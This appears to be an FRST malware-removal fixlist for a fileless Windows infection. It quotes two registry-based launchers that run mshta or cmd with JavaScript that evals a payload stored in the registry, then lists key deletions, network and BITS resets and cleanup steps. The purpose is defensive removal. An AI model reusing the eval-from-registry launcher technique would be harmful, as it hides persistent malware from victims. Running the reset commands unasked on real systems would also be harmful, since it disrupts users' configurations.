CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION
DeleteKey: HKCU\\software\\ppfkbxc
DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> No File
Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()
C:\Users\Dorraine\AppData\Local\Ygogud Ri
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp: